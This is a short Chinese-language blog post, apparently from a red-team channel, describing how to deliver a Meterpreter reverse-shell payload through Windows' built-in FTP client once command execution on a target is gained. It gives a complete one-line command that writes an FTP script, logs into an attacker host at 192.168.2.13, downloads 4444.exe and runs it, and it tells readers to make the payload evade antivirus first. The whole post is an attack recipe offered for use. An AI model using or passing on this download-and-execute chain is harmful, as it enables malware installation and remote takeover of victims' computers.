通过Windows自带FTP一条命令反弹Meterpreter

文章目录

当我们在拿到一个cmd命令执行的口子的时候，我们需要高效的让目标技巧下载我们的文件，今天先分享一个通过win全版本都通用的ftp一条命令下载文件！

---

---

通过Windows自带FTP一条命令反弹Meterpreter

首先在黑客机器上开启一个 ftp 服务：root、root

其中 ftp 目录下有我们的 恶意程序：4444.exe（在实际情况下兄弟们需要提前做好免杀）

我们需要执行的命令是：

ftp
open 192.168.2.13 21
root
root
bin
get 4444.exe
bye

命令如下：

echo ftp>>1.txt&&echo open 192.168.2.13 21>>1.txt&&echo root>>1.txt&&echo root>>1.txt&&echo bin>>1.txt&&echo get 4444.exe>>1.txt&&echo bye>>1.txt&&ftp -s:1.txt&&4444.exe

原理是：连接目标ftp，然后下载文件 4444.exe 并执行。

联系我

公众号：渗透攻击红队

知识星球：渗透攻击红队